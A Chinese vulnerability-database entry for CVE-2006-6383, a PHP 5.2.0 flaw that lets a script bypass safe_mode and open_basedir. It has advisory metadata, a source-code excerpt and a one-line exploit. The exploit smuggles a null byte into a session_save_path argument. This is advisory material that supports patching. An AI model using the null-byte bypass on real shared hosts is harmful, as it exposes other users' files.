PHP session.save_path()函数绕过safe_mode及open_basedir安全限制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111728 漏洞类型 输入验证
发布时间 2006-12-08 更新时间 2007-03-15
CVE编号 CVE-2006-6383 CNNVD-ID CNNVD-200612-211
漏洞平台 PHP CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/29239
https://www.securityfocus.com/bid/21508
https://cxsecurity.com/issue/WLB-2006120071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-211
|漏洞详情
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。PHP在处理会话信息的功能函数实现上存在漏洞,远程攻击者可能利用此漏洞读取敏感信息或向非授权位置写入文件。可以在PHP的ini_set()中定义用于保存会话路径的session_save_path()函数。在session.save_path中必须要存在用于保存tmp文件的路径,但session.save_path的句法可能为:[/PATH]或[N;/PATH]N-可以是一个串例如:1.session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")2.session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")3.session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")PHP520ext/session/session.c中代码:--1477-1493---PHP_FUNCTION(session_save_path){zval**p_name;intac=ZEND_NUM_ARGS();char*old;if(ac<0||ac>1||zend_get_parameters_ex(ac,&p_name)==FAILURE)WRONG_PARAM_COUNT;old=estrdup(PS(save_path));if(ac==1){convert_to_string_ex(p_name);zend_alter_ini_entry("session.save_path",sizeof("session.save_path"),\Z_STRVAL_PP(p_name),Z_STRLEN_PP(p_name),PHP_INI_USER,PHP_INI_STAGE_RUNTIME);}RETVAL_STRING(old,0);}--1477-1493---值被设置为了hash_memory,但在这之前,safe_mode和open_basedir会检查这个值。如果用户启动了会话的话(如session_start()),PS_OPEN_FUNC(files)函数会检查session.save_path的值。PHP520ext/s
|漏洞EXP
source: http://www.securityfocus.com/bid/21508/info

PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.

PHP version 5.2.0 is vulnerable to this issue.

session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")
|受影响的产品
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE SUSE Linux Enterprise Server 10 SuSE S
|参考资料

来源:BID
名称:21508
链接:http://www.securityfocus.com/bid/21508
来源:BUGTRAQ
名称:20061208PHP5.2.0session.save_pathsafe_modeandopen_basedirbypass
链接:http://www.securityfocus.com/archive/1/archive/1/453938/30/9270/threaded
来源:SREASONRES
名称:20061208PHP5.2.0session.save_pathsafe_modeandopen_basedirbypass
链接:http://securityreason.com/achievement_securityalert/43
来源:cvs.php.net
链接:http://cvs.php.net/viewcvs.cgi/php-src/ext/session/session.c?r1=1.336.2.53.2.7&r2=1.336.2.53.2.8
来源:OPENPKG
名称:OpenPKG-SA-2007.010
链接:http://www.openpkg.com/security/advisories/OpenPKG-SA-2007.010.html
来源:MANDRIVA
名称:MDKSA-2007:038
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2007:038
来源:SREASON
名称:2000
链接:http://securityreason.com/securityalert/2000
来源:SECUNIA
名称:24514
链接:http://secunia.com/advisories/24514
来源:SECUNIA
名称:24022
链接:http://secunia.com/advisories/24022
来源:SUSE
名称:SUSE-SA:2007:020
链接:http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html